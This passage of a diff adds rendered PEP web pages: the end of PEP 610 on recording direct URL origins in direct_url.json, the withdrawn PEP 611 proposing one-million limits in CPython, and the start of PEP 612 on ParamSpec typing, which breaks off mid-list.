Since at least three different ways already exist to encode this type of +information, this PEP uses a dictionary format, so as not to make any +assumption on how a direct +URL reference must ultimately be encoded in a requirement or lockfile. See also +the Alternatives section below for more discussion about this choice.

+

Information has been taken from Ruby’s bundler manual to verify it has similar +capabilities and inform the selection and naming of fields in this +specifications.

+

The JSON format allows for the addition of additional fields in the future.

+
+
+

Specification

+

This PEP specifies a direct_url.json file in the .dist-info directory +of an installed distribution, to record the Direct URL Origin of the distribution.

+

The canonical source for the name and semantics of this metadata file is +the Recording the Direct URL Origin of installed distributions document.

+

This file MUST be created by installers when installing a distribution +from a requirement specifying a direct URL reference (including a VCS URL).

+

This file MUST NOT be created when installing a distribution from an other +type of requirement (i.e. name plus version specifier).

+

This JSON file MUST be a dictionary, compliant with RFC 8259 and UTF-8 +encoded.

+

If present, it MUST contain at least two fields. The first one is url, with +type string. Depending on what url refers to, the second field MUST be +one of vcs_info (if url is a VCS reference), archive_info (if +url is a source archives or a wheel), or dir_info (if url is a +local directory). These info fields have a (possibly empty) subdictionary as +value, with the possible keys defined below.

+

url MUST be stripped of any sensitive authentication information, +for security reasons.

+

The user:password section of the URL MAY however +be composed of environment variables, matching the following regular +expression:

+
\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?
+
+
+

Additionally, the user:password section of the URL MAY be a +well-known, non security sensitive string. A typical example is git +in the case of an URL such as ssh://git@gitlab.com.

+

When url refers to a VCS repository, the vcs_info key MUST be present +as a dictionary with the following keys:

+
    +
  • A vcs key (type string) MUST be present, containing the name of the VCS +(i.e. one of git, hg, bzr, svn). Other VCS’s SHOULD be registered by +writing a PEP to amend this specification. +The url value MUST be compatible with the corresponding VCS, +so an installer can hand it off without transformation to a +checkout/download command of the VCS.
  • +
  • A requested_revision key (type string) MAY be present naming a +branch/tag/ref/commit/revision/etc (in a format compatible with the VCS) +to install.
  • +
  • A commit_id key (type string) MUST be present, containing the +exact commit/revision number that was installed. +If the VCS supports commit-hash +based revision identifiers, such commit-hash MUST be used as +commit_id in order to reference the immutable +version of the source code that was installed.
  • +
  • If the installer could discover additional information about +the requested revision, it MAY add a resolved_revision and/or +resolved_revision_type field. If no revision was provided in +the requested URL, resolved_revision MAY contain the default branch +that was installed, and resolved_revision_type will be branch. +If the installer determines that requested_revision was a tag, it MAY +add resolved_revision_type with value tag.
  • +
+

When url refers to a source archive or a wheel, the archive_info key +MUST be present as a dictionary with the following key:

+
    +
  • A hash key (type string) SHOULD be present, with value +<hash-algorithm>=<expected-hash>. +It is RECOMMENDED that only hashes which are unconditionally provided by +the latest version of the standard library’s hashlib module be used for +source archive hashes. At time of writing, that list consists of ‘md5’, +‘sha1’, ‘sha224’, ‘sha256’, ‘sha384’, and ‘sha512’.
  • +
+

When url refers to a local directory, the dir_info key MUST be +present as a dictionary with the following key:

+
    +
  • editable (type: boolean): true if the distribution was installed +in editable mode, false otherwise. If absent, default to false.
  • +
+

When url refers to a local directory, it MUST have the file scheme +and be compliant with RFC 8089. In particular, the path component must +be absolute. Symbolic links SHOULD be preserved when making relative +paths absolute.

+
+

Note

+

When the requested URL has the file:// scheme and points to a local directory that happens to contain a +VCS checkout, installers MUST NOT attempt to infer any VCS information and +therefore MUST NOT output any VCS related information (such as vcs_info) +in direct_url.json.

+
+

A top-level subdirectory field MAY be present containing a directory path, +relative to the root of the VCS repository, source archive or local directory, +to specify where pyproject.toml or setup.py is located.

+
+

Note

+

As a general rule, installers should as much as possible preserve the +information that was provided in the requested URL when generating +direct_url.json. For example, user:password environment variables +should be preserved and requested_revision should reflect the revision that was +provided in the requested URL as faithfully as possible. This information is +however enriched with more precise data, such as commit_id.

+
+
+

Registered VCS

+

This section lists the registered VCS’s; expanded, VCS-specific information +on how to use the vcs, requested_revision, and other fields of +vcs_info; and in +some cases additional VCS-specific fields. +Tools MAY support other VCS’s although it is RECOMMENDED to register +them by writing a PEP to amend this specification. The vcs field SHOULD be the command name +(lowercased). Additional fields that would be necessary to +support such VCS SHOULD be prefixed with the VCS command name.

+
+

Git

+

Home page

+
+
+

vcs command

+
+
git
+

vcs field

+
+
git
+

requested_revision field

+
+
A tag name, branch name, Git ref, commit hash, shortened commit hash, +or other commit-ish.
+

commit_id field

+
+
A commit hash (40 hexadecimal characters sha1).
+
+

Note

+

Installers can use the git show-ref and git symbolic-ref commands +to determine if the requested_revision corresponds to a Git ref. +In turn, a ref beginning with refs/tags/ corresponds to a tag, and +a ref beginning with refs/remotes/origin/ after cloning corresponds +to a branch.

+
+
+
+

Mercurial

+

Home page

+
+
+

vcs command

+
+
hg
+

vcs field

+
+
hg
+

requested_revision field

+
+
A tag name, branch name, changeset ID, shortened changeset ID.
+

commit_id field

+
+
A changeset ID (40 hexadecimal characters).
+
+
+

Bazaar

+

Home page

+
+
+

vcs command

+
+
bzr
+

vcs field

+
+
bzr
+

requested_revision field

+
+
A tag name, branch name, revision id.
+

commit_id field

+
+
A revision id.
+
+
+

Subversion

+

Home page

+
+
+

vcs command

+
+
svn
+

vcs field

+
+
svn
+

requested_revision field

+
+
requested_revision must be compatible with svn checkout --revision option. +In Subversion, branch or tag is part of url.
+

commit_id field

+
+
Since Subversion does not support globally unique identifiers, +this field is the Subversion revision number in the corresponding +repository.
+
+
+
+
+

Examples

+
+

Example direct_url.json

+

Source archive:

+
{
+    "url": "https://github.com/pypa/pip/archive/1.3.1.zip",
+    "archive_info": {
+        "hash": "sha256=2dc6b5a470a1bde68946f263f1af1515a2574a150a30d6ce02c6ff742fcc0db8"
+    }
+}
+
+
+

Git URL with tag and commit-hash:

+
{
+    "url": "https://github.com/pypa/pip.git",
+    "vcs_info": {
+        "vcs": "git",
+        "requested_revision": "1.3.1",
+        "resolved_revision_type": "tag",
+        "commit_id": "7921be1537eac1e97bc40179a57f0349c2aee67d"
+    }
+}
+
+
+

Local directory:

+
{
+    "url": "file:///home/user/project",
+    "dir_info": {}
+}
+
+
+

Local directory installed in editable mode:

+
{
+    "url": "file:///home/user/project",
+    "dir_info": {
+        "editable": true
+    }
+}
+
+
+
+
+

Example pip commands and their effect on direct_url.json

+

Commands that generate a direct_url.json:

+
    +
  • pip install https://example.com/app-1.0.tgz
  • +
  • pip install https://example.com/app-1.0.whl
  • +
  • pip install “git+https://example.com/repo/app.git#egg=app&subdirectory=setup”
  • +
  • pip install ./app
  • +
  • pip install file:///home/user/app
  • +
  • pip install –editable “git+https://example.com/repo/app.git#egg=app&subdirectory=setup” +(in which case, url will be the local directory where the git repository has been +cloned to, and dir_info will be present with "editable": true and no +vcs_info will be set)
  • +
  • pip install -e ./app
  • +
+

Commands that do not generate a direct_url.json

+ +
+
+
+

Use cases

+

“Freezing” an environment

+
+
Tools, such as pip freeze, which generate requirements from the Database +of Installed Python Distributions SHOULD exploit direct_url.json +if it is present, and give it priority over the Version metadata in order +to generate a higher fidelity output. In the presence of a vcs direct URL reference, +the commit_id field SHOULD be used in priority in order to provide +the highest possible fidelity to the originally installed version. If +supported by their requirement format, tools are encouraged also to output +the tag value if present, as it has immutable semantics. +Tools MAY choose another approach, depending on the needs of their users.

Note the initial iteration of this PEP does not attempt to make environments +that include editable installs or installs from local directories +reproducible, but it does attempt to make them readily identifiable. By +locating the local project directory via the url and dir_info fields +of this specification, tools can implement any strategy that fits their use +cases.

+
+
+
+

Backwards Compatibility

+

Since this PEP specifies a new file in the .dist-info directory, +there are no backwards compatibility implications.

+
+
+

Alternatives

+
+

PEP 426 source_url

+

The now withdrawn PEP 426 specifies a source_url metadata entry. +It is also implemented in distlib.

+

It was intended for a slightly different purpose, for use in sdists.

+

This format lacks support for the subdirectory option of pip requirement +URLs. The same limitation is present in PEP440 Direct References.

+

It also lacks explicit support for environment variables in the user:password +part of URLs.

+

The introduction of a key/value extensibility mechanism and support +for environment variables for user:password in PEP 440, would be necessary +for use in this PEP.

+
+
+

revision vs ref

+

The requested_revision key was retained over requested_ref as it is a more generic term +across various VCS and ref has a specific meaning for git.

+
+
+
+

Acknowledgements

+

Various people helped make this PEP a reality. Paul F. Moore provided the +essence of the abstract. Alyssa Coghlan suggested the direct_url name.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0610.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0611/index.html b/pep-0611/index.html new file mode 100644 index 00000000000..7ba0ea16148 --- /dev/null +++ b/pep-0611/index.html @@ -0,0 +1,475 @@ + + + + + + + + PEP 611 – The one million limit | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 611 – The one million limit

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Dec-2019
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PR proposes a soft limit of one million (1 000 000), and a larger hard limit +for various aspects of Python code and its implementation.

+

The Python language does not specify limits for many of its features. +Not having any limit to these values seems to enhance programmer freedom, +at least superficially, but in practice the CPython VM and other Python virtual +machines have implicit limits or are forced to assume that the limits are +astronomical, which is expensive.

+

This PR lists a number of features which are to have a limit of one million.

+

For CPython the hard limit will be eight million (8 000 000).

+
+
+

Motivation

+

There are many values that need to be represented in a virtual machine. +If no limit is specified for these values, +then the representation must either be inefficient or vulnerable to overflow. +The CPython virtual machine represents values like line numbers, +stack offsets and instruction offsets by 32 bit values. This is inefficient, and potentially unsafe.

+

It is inefficient as actual values rarely need more than a dozen or so bits to represent them.

+

It is unsafe as malicious or poorly generated code could cause values to exceed 232.

+

For example, line numbers are represented by 32 bit values internally. +This is inefficient, given that modules almost never exceed a few thousand lines. +Despite being inefficient, it is still vulnerable to overflow as +it is easy for an attacker to created a module with billions of newline characters.

+

Memory access is usually a limiting factor in the performance of modern CPUs. +Better packing of data structures enhances locality and reduces memory bandwidth, +at a modest increase in ALU usage (for shifting and masking). +Being able to safely store important values in 20 bits would allow memory savings +in several data structures including, but not limited to:

+
    +
  • Frame objects
  • +
  • Object headers
  • +
  • Code objects
  • +
+

There is also the potential for a more efficient instruction format, speeding up interpreter dispatch.

+
+

Is this a worthwhile trade off?

+

The downside of any form of limit is that it might potentially make someone’s job harder, +for example, it may be harder to write a code generator that keeps the size of modules to one million lines. +However, it is the author’s opinion, having written many code generators, +that such a limit is extremely unlikely to be a problem in practice.

+

The upside of these limits is the freedom it grants implementers of runtimes, whether CPython, +PyPy, or any other implementation, to improve performance. +It is the author’s belief, that the potential value of even a 0.1% reduction in the cost +of running Python programs globally will hugely exceed the cost of modifying a handful of code generators.

+
+
+
+

Rationale

+

Imposing a limit on values such as lines of code in a module, and the number of local variables, +has significant advantages for ease of implementation and efficiency of virtual machines. +If the limit is sufficiently large, there is no adverse effect on users of the language.

+

By selecting a fixed but large limit for these values, +it is possible to have both safety and efficiency whilst causing no inconvenience to human programmers +and only very rare problems for code generators.

+
+

One million

+

The value “one million” is very easy to remember.

+

The one million limit is mostly a limit on human generated code, not runtime sizes.

+

One million lines in a single module is a ridiculous concentration of code; +the entire Python standard library is about 2/3rd of a million lines, spread over 1600 files.

+

The Java Virtual Machine (JVM) [1] specifies a limit of 216-1 (65535) for many program +elements similar to those covered here. +This limit enables limited values to fit in 16 bits, which is a very efficient machine representation. +However, this limit is quite easily exceeded in practice by code generators and +the author is aware of existing Python code that already exceeds 216 lines of code.

+

The hard limit of eight million fits into 23 bits which, although not as convenient for machine representation, +is still reasonably compact. +A limit of eight million is small enough for efficiency advantages (only 23 bits), +but large enough not to impact users (no one has ever written a module that large).

+

While it is possible that generated code could exceed the limit, +it is easy for a code generator to modify its output to conform. +The author has hit the 64K limit in the JVM on at least two occasions when generating Java code. +The workarounds were relatively straightforward and wouldn’t +have been necessary with a limit of one million bytecodes or lines of code.

+

Where necessary, the soft limit can increased for those programs that exceed the one million limit.

+

Having a soft limit of one million provides a warning of problematic code, without causing an error and forcing an immediate fix. +It also allows dynamic optimizers to use more compact formats without inline checks.

+
+
+
+

Specification

+

This PR proposes that the following language features and runtime values have a soft limit of one million.

+
    +
  • The number of source code lines in a module
  • +
  • The number of bytecode instructions in a code object.
  • +
  • The sum of local variables and stack usage for a code object.
  • +
  • The number of classes in a running interpreter.
  • +
  • The recursion depth of Python code.
  • +
+

It is likely that memory constraints would be a limiting factor before the number of classes reaches one million.

+
+

Recursion depth

+

The recursion depth limit only applies to pure Python code. Code written in a foreign language, such as C, +may consume hardware stack and thus be limited to a recursion depth of a few thousand. +It is expected that implementations will raise an exception should the hardware stack get close to its limit. +For code that mixes Python and C calls, it is most likely that the hardware limit will apply first. +The size of the hardware recursion may vary at runtime and will not be visible.

+
+
+
+

Soft and hard limits

+

Implementations should emit a warning whenever a soft limit is exceeded, unless the hard limit has the same value as the soft limit. +When a hard limit is exceeded, then an exception should be raised.

+

Depending on the implementation, different hard limits might apply. In some cases the hard limit might be below the soft limit. +For example, many micropython ports are unlikely to be able to support such large limits.

+
+

Introspecting and modifying the limits

+

One or more functions will be provided in the sys module to introspect or modify the soft limits at runtime, +but the limits may not be raised above the hard limit.

+
+
+

Inferred limits

+

These limits are not part of the specification, but a limit of less than one million +can be inferred from the limit on the number of bytecode instructions in a code object. +Because there would be insufficient instructions to load more than +one million constants or use more than one million names.

+
    +
  • The number of distinct names in a code object.
  • +
  • The number of constants in a code object.
  • +
+
+
+

The advantages for CPython of imposing these limits:

+
+

Line of code in a module and code object restrictions.

+

When compiling source code to bytecode or modifying bytecode for profiling or debugging, +an intermediate form is required. By limiting operands to 23 bits, +instructions can be represented in a compact 64 bit form allowing +very fast passes over the instruction sequence.

+

Having 23 bit operands (24 bits for relative branches) allows instructions +to fit into 32 bits without needing additional EXTENDED_ARG instructions. +This improves dispatch, as the operand is strictly local to the instruction. +It is unclear whether this would help performance, it is merely an example of what is possible.

+

The benefit of restricting the number of lines in a module is primarily the implied limit on bytecodes. +It is more important for implementations that it is instructions per code object, not lines per module, that is limited to one million, +but it is much easier to explain a one million line limit. Having a consistent limit of one million is just easier to remember. +It is mostly likely, although not guaranteed, that the line limit will be hit first and thus provide a simpler to understand error message to the developer.

+
+
+

Total number of classes in a running interpreter

+

This limit has to the potential to reduce the size of object headers considerably.

+

Currently objects have a two word header, for objects without references +(int, float, str, etc.) or a four word header for objects with references. +By reducing the maximum number of classes, the space for the class reference +can be reduced from 64 bits to fewer than 32 bits allowing a much more compact header.

+

For example, a super-compact header format might look like this:

+
struct header {
+    uint32_t gc_flags:6; /* Needs finalisation, might be part of a cycle, etc. */
+    uint32_t class_id:26; /* Can be efficiently mapped to address by ensuring suitable alignment of classes */
+    uint32_t refcount; /* Limited memory or saturating */
+}
+
+
+

This format would reduce the size of a Python object without slots, on a 64 bit machine, from 40 to 16 bytes.

+

Note that there are two ways to use a 32 bit refcount on a 64 bit machine. +One is to limit each sub-interpreter to 32Gb of memory. +The other is to use a saturating reference count, which would be a little bit slower, but allow unlimited memory allocation.

+
+
+
+

Enforcement

+

Python implementations are not obliged to enforce the limits. +However, if a limit can be enforced without hurting performance, then it should be.

+

It is anticipated that CPython will enforce the limits as follows:

+
    +
  • The number of source code lines in a module: version 3.9 onward.
  • +
  • The number of bytecode instructions in a code object: 3.9 onward.
  • +
  • The sum of local variables and stack usage for a code object: 3.9 onward.
  • +
  • The number of classes in a running interpreter: probably 3.10 onward, maybe warning in 3.9.
  • +
+
+
+
+

Hard limits in CPython

+

CPython will enforce a hard limit on all the above values. The value of the hard limit will be 8 million.

+

It is hypothetically possible that some machine generated code exceeds one or more of the above limits. +The author believes that to be incredibly unlikely and easily fixed by modifying the output stage of the code generator.

+

We would like to gain the benefit from the above limits for performance as soon as possible. +To that end, CPython will start applying limits from version 3.9 onward. +To ease the transition and minimize breakage, the initial limits will be 16 million, reducing to 8 million in a later version.

+
+
+

Backwards Compatibility

+

The actual hard limits enforced by CPython will be:

+ + + + + + + + + + + + + + +
VersionHard limit
3.916 million
3.10 onward8 million
+

Given the rarity of code generators that would exceed the one million limits, +and the environments in which they are typically used, it seems reasonable +to start issuing warnings in 3.9 if any limited quantity exceeds one million.

+

Historically the recursion limit has been set at 1000. To avoid breaking code that implicitly relies on the value being small, +the soft recursion limit will be increased gradually, as follows:

+ + + + + + + + + + + + + + + + + + + + + + + +
VersionSoft limit
3.94 000
3.1016 000
3.1164 000
3.12125 000
3.131 million
+

The hard limit will be set to 8 million immediately.

+
+
+

Other implementations

+

Implementations of Python other than CPython have different purposes, so different limits might be appropriate. +This is acceptable, provided the limits are clearly documented.

+
+

General purpose implementations

+

General purpose implementations, such as PyPy, should use the one million limit. +If maximum compatibility is a goal, then they should also follow CPython’s behaviour for 3.9 to 3.11.

+
+
+

Special purpose implementations

+

Special purpose implementations may use lower limits, as long as they are clearly documented. +An implementation designed for embedded systems, for example MicroPython, might impose limits as low as a few thousand.

+
+
+
+

Security Implications

+

Minimal. This reduces the attack surface of any Python virtual machine by a small amount.

+
+
+

Reference Implementation

+

None, as yet. This will be implemented in CPython, once the PEP has been accepted.

+
+
+

Rejected Ideas

+

Being able to modify the hard limits upwards at compile time was suggested by Tal Einat. +This is rejected as the current limits of 232 have not been an issue, and the practical +advantages of allowing limits between 220 and 232 seem slight compared to the additional +code complexity of supporting such a feature.

+
+
+

Open Issues

+

None, as yet.

+
+
+

References

+ +

https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0611.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0612/index.html b/pep-0612/index.html new file mode 100644 index 00000000000..a79b22ff6b0 --- /dev/null +++ b/pep-0612/index.html @@ -0,0 +1,886 @@ + + + + + + + + PEP 612 – Parameter Specification Variables | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 612 – Parameter Specification Variables

+
+
Author:
+
Mark Mendoza <mendoza.mark.a at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
18-Dec-2019
+
Python-Version:
+
3.10
+
Post-History:
+
18-Dec-2019, 13-Jul-2020
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see ParamSpec and +typing.ParamSpec for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

There currently are two ways to specify the type of a callable, the +Callable[[int, str], bool] syntax defined in PEP 484, +and callback protocols from PEP +544. Neither of +these support forwarding the parameter types of one callable over to another +callable, making it difficult to annotate function decorators. This PEP proposes +typing.ParamSpec and typing.Concatenate to +support expressing these kinds of relationships.

+
+
+

Motivation

+

The existing standards for annotating higher order functions don’t give us the +tools to annotate the following common decorator pattern satisfactorily:

+
from typing import Awaitable, Callable, TypeVar
+
+R = TypeVar("R")
+
+def add_logging(f: Callable[..., R]) -> Callable[..., Awaitable[R]]:
+  async def inner(*args: object, **kwargs: object) -> R:
+    await log_to_database()
+    return f(*args, **kwargs)
+  return inner
+
+@add_logging
+def takes_int_str(x: int, y: str) -> int:
+  return x + 7
+
+await takes_int_str(1, "A")
+await takes_int_str("B", 2) # fails at runtime
+
+
+

add_logging, a decorator which logs before each entry into the decorated +function, is an instance of the Python idiom of one function passing all +arguments given to it over to another function. This is done through the +combination of the *args and **kwargs features in both parameters and in +arguments. When one defines a function (like inner) that takes (*args, +**kwargs) and goes on to call another function with (*args, **kwargs), +the wrapping function can only be safely called in all of the ways that the +wrapped function could be safely called. To type this decorator, we’d like to be +able to place a dependency between the parameters of the callable f and the +parameters of the returned function. PEP 484 +supports dependencies between +single types, as in def append(l: typing.List[T], e: T) -> typing.List[T]: +..., but there is no existing way to do so with a complicated entity like +the parameters of a function.

+

Due to the limitations of the status quo, the add_logging example will type +check but will fail at runtime. inner will pass the string “B” into +takes_int_str, which will try to add 7 to it, triggering a type error. +This was not caught by the type checker because the decorated takes_int_str +was given the type Callable[..., Awaitable[int]] (an ellipsis in place of +parameter types is specified to mean that we do no validation on arguments).

+

Without the ability to define dependencies between the parameters of different +callable types, there is no way, at present, to make add_logging compatible +with all functions, while still preserving the enforcement of the parameters of +the decorated function.

+

With the addition of the ParamSpec variables proposed by this +PEP, we can rewrite the previous example in a way that keeps the flexibility of +the decorator and the parameter enforcement of the decorated function.

+
from typing import Awaitable, Callable, ParamSpec, TypeVar
+
+P = ParamSpec("P")
+R = TypeVar("R")
+
+def add_logging(f: Callable[P, R]) -> Callable[P, Awaitable[R]]:
+  async def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    await log_to_database()
+    return f(*args, **kwargs)
+  return inner
+
+@add_logging
+def takes_int_str(x: int, y: str) -> int:
+  return x + 7
+
+await takes_int_str(1, "A") # Accepted
+await takes_int_str("B", 2) # Correctly rejected by the type checker
+
+
+

Another common decorator pattern that has previously been impossible to type is +the practice of adding or removing arguments from the decorated function. For +example:

+
class Request:
+  ...
+
+def with_request(f: Callable[..., R]) -> Callable[..., R]:
+  def inner(*args: object, **kwargs: object) -> R:
+    return f(Request(), *args, **kwargs)
+  return inner
+
+@with_request
+def takes_int_str(request: Request, x: int, y: str) -> int:
+  # use request
+  return x + 7
+
+takes_int_str(1, "A")
+takes_int_str("B", 2) # fails at runtime
+
+
+

With the addition of the Concatenate operator from this PEP, we can even +type this more complex decorator.

+
from typing import Concatenate
+
+def with_request(f: Callable[Concatenate[Request, P], R]) -> Callable[P, R]:
+  def inner(*args: P.args, **kwargs: P.kwargs) -> R:
+    return f(Request(), *args, **kwargs)
+  return inner
+
+@with_request
+def takes_int_str(request: Request, x: int, y: str) -> int:
+  # use request
+  return x + 7
+
+takes_int_str(1, "A") # Accepted
+takes_int_str("B", 2) # Correctly rejected by the type checker
+
+
+
+
+

Specification

+
+

ParamSpec Variables

+
+

Declaration

+

A parameter specification variable is defined in a similar manner to how a +normal type variable is defined with typing.TypeVar.

+
from typing import ParamSpec
+P = ParamSpec("P")         # Accepted
+P = ParamSpec("WrongName") # Rejected because P =/= WrongName
+
+
+

The runtime should accept bounds and covariant and contravariant +arguments in the declaration just as typing.TypeVar does, but for now we +will defer the standardization of the semantics of those options to a later PEP.

+
+
+

Valid use locations

+

Previously only a list of parameter arguments ([A, B, C]) or an ellipsis +(signifying “undefined parameters”) were acceptable as the first “argument” to +typing.Callable . We now augment that with two new options: a parameter +specification variable (Callable[P, int]) or a concatenation on a +parameter specification variable (Callable[Concatenate[int, P], int]).

+
callable ::= Callable "[" parameters_expression, type_expression "]"
+
+parameters_expression ::=
+  | "..."
+  | "[" [ type_expression ("," type_expression)* ] "]"
+  | parameter_specification_variable
+  | concatenate "["
+                   type_expression ("," type_expression)* ","
+                   parameter_specification_variable
+                "]"
+
+
+

where parameter_specification_variable is a typing.ParamSpec variable, +declared in the manner as defined above, and concatenate is +typing.Concatenate.

+

As before, parameters_expressions by themselves are not acceptable in +places where a type is expected

+
def foo(x: P) -> P: ...                           # Rejected
+def foo(x: Concatenate[int, P]) -> int: ...       # Rejected
+def foo(x: typing.List[P]) -> None: ...           # Rejected
+def foo(x: Callable[[int, str], P]) -> None: ...  # Rejected
+
+
+
+
+

User-Defined Generic Classes

+

Just as defining a class as inheriting from Generic[T] makes a class generic +for a single parameter (when T is a TypeVar), defining a class as +inheriting from Generic[P] makes a class generic on +parameters_expressions (when P is a ParamSpec).

+
T = TypeVar("T")
+P_2 = ParamSpec("P_2")
+
+class X(Generic[T, P]):
+  f: Callable[P, int]
+  x: T
+
+def f(x: X[int, P_2]) -> str: ...                    # Accepted
+def f(x: X[int, Concatenate[int, P_2]]) -> str: ...  # Accepted
+def f(x: X[int, [int, bool]]) -> str: ...            # Accepted
+def f(x: X[int, ...]) -> str: ...                    # Accepted
+def f(x: X[int, int]) -> str: ...                    # Rejected
+
+
+

By the rules defined above, spelling a concrete instance of a class generic +with respect to only a single ParamSpec would require unsightly double +brackets. For aesthetic purposes we allow these to be omitted.

+
class Z(Generic[P]):
+  f: Callable[P, int]
+
+def f(x: Z[[int, str, bool]]) -> str: ...   # Accepted
+def f(x: Z[int, str, bool]) -> str: ...     # Equivalent
+
+# Both Z[[int, str, bool]] and Z[int, str, bool] express this:
+class Z_instantiated:
+  f: Callable[[int, str, bool], int]
+
+
+
+
+

Semantics

+

The inference rules for the return type of a function invocation whose signature +contains a ParamSpec variable are analogous to those around +evaluating ones with TypeVars.

+
def changes_return_type_to_str(x: Callable[P, int]) -> Callable[P, str]: ...
+
+def returns_int(a: str, b: bool) -> int: ...
+
+f = changes_return_type_to_str(returns_int) # f should have the type:
+                                            # (a: str, b: bool) -> str
+
+f("A", True)               # Accepted
+f(a="A", b=True)           # Accepted
+f("A", "A")                # Rejected
+
+expects_str(f("A", True))  # Accepted
+expects_int(f("A", True))  # Rejected
+
+
+

Just as with traditional TypeVars, a user may include the same +ParamSpec multiple times in the arguments of the same function, +to indicate a dependency between multiple arguments. In these cases a type +checker may choose to solve to a common behavioral supertype (i.e. a set of +parameters for which all of the valid calls are valid in both of the subtypes), +but is not obligated to do so.

+
P = ParamSpec("P")
+
+def foo(x: Callable[P, int], y: Callable[P, int]) -> Callable[P, bool]: ...
+
+def x_y(x: int, y: str) -> int: ...
+def y_x(y: int, x: str) -> int: ...
+
+foo(x_y, x_y)  # Should return (x: int, y: str) -> bool
+
+foo(x_y, y_x)  # Could return (__a: int, __b: str) -> bool
+               # This works because both callables have types that are
+               # behavioral subtypes of Callable[[int, str], int]
+
+
+def keyword_only_x(*, x: int) -> int: ...
+def keyword_only_y(*, y: int) -> int: ...
+foo(keyword_only_x, keyword_only_y) # Rejected
+
+
+

The constructors of user-defined classes generic on ParamSpecs should be +evaluated in the same way.

+
U = TypeVar("U")
+
+class Y(Generic[U, P]):
+  f: Callable[P, str]
+  prop: U
+
+  def __init__(self, f: Callable[P, str], prop: U) -> None:
+    self.f = f
+    self.prop = prop
+
+def a(q: int) -> str: ...
+
+Y(a, 1)   # Should resolve to Y[(q: int), int]
+Y(a, 1).f # Should resolve to (q: int) -> str
+
+
+

The semantics of Concatenate[X, Y, P] are that it represents the parameters +represented by P with two positional-only parameters prepended. This means +that we can use it to represent higher order functions that add, remove or +transform a finite number of parameters of a callable.

+
def bar(x: int, *args: bool) -> int: ...
+
+def add(x: Callable[P, int]) -> Callable[Concatenate[str, P], bool]: ...
+
+add(bar)       # Should return (__a: str, x: int, *args: bool) -> bool
+
+def remove(x: Callable[Concatenate[int, P], int]) -> Callable[P, bool]: ...
+
+remove(bar)    # Should return (*args: bool) -> bool
+
+def transform(
+  x: Callable[Concatenate[int, P], int]
+) -> Callable[Concatenate[str, P], bool]: ...
+
+transform(bar) # Should return (__a: str, *args: bool) -> bool
+
+
+

This also means that while any function that returns an R can satisfy +typing.Callable[P, R], only functions that can be called positionally in +their first position with a X can satisfy +typing.Callable[Concatenate[X, P], R].

+
def expects_int_first(x: Callable[Concatenate[int, P], int]) -> None: ...
+
+@expects_int_first # Rejected
+def one(x: str) -> int: ...
+
+@expects_int_first # Rejected
+def two(*, x: int) -> int: ...
+
+@expects_int_first # Rejected
+def three(**kwargs: int) -> int: ...
+
+@expects_int_first # Accepted
+def four(*args: int) -> int: ...
+
+
+

There are still some classes of decorators still not supported with these +features:

+
    +
  • those that add/remove/change a variable number of parameters (for +example, functools.partial will remain untypable even after this PEP)
  • +
  • those that add/remove/change keyword-only parameters (See +Concatenating Keyword Parameters for more details).
  • +
+
+
+
+

The components of a ParamSpec

+

A ParamSpec captures both positional and keyword accessible +parameters, but there unfortunately is no object in the runtime that captures +both of these together. Instead, we are forced to separate them into *args +and **kwargs, respectively. This means we need to be able to split apart +a single ParamSpec into these two components, and then bring +them back together into a call. To do this, we introduce P.args to +represent the tuple of positional arguments in a given call and +P.kwargs to represent the corresponding Mapping of keywords to +values.

+
+

Valid use locations

+

These “properties” can only be used as the annotated types for +*args and **kwargs, accessed from a ParamSpec already in scope.

+
def puts_p_into_scope(f: Callable[P, int]) -> None:
+
+  def inner(*args: P.args, **kwargs: P.kwargs) -> None:      # Accepted
+    pass
+
+  def mixed_up(*args: P.kwargs, **kwargs: P.args) -> None:   # Rejected
+    pass
+
+  def misplaced(x: P.args) -> None:                          # Rejected
+    pass
+
+def out_of_scope(*args: P.args, **kwargs: P.kwargs) -> None: # Rejected
+  pass
+
+
+

Furthermore, because the default kind of parameter in Python ((x: int)) +may be addressed both positionally and through its name, two valid invocations +of a (*args: P.args, **kwargs: P.kwargs) function may give different +partitions of the same set of parameters. Therefore, we need to make sure that +these special types are only brought into the world together, and are used +together, so that our usage is valid for all possible partitions.

+
def puts_p_into_scope(f: Callable[P, int]) -> None:
+
+  stored_args: P.args                           # Rejected
+
+  stored_kwargs: P.kwargs                       # Rejected
+
+  def just_args(*args: P.args) -> None:         # Rejected
+    pass
+
+  def just_kwargs(**kwargs: P.kwargs) -> None:  # Rejected
+    pass
+
+
+
+
+

Semantics

+

With those requirements met, we can now take advantage of the unique properties +afforded to us by this set up:

+
    +
  • Inside the function, args has the type P.args, not +Tuple[P.args, ...] as would be with a normal annotation +(and likewise with the **kwargs)
      +
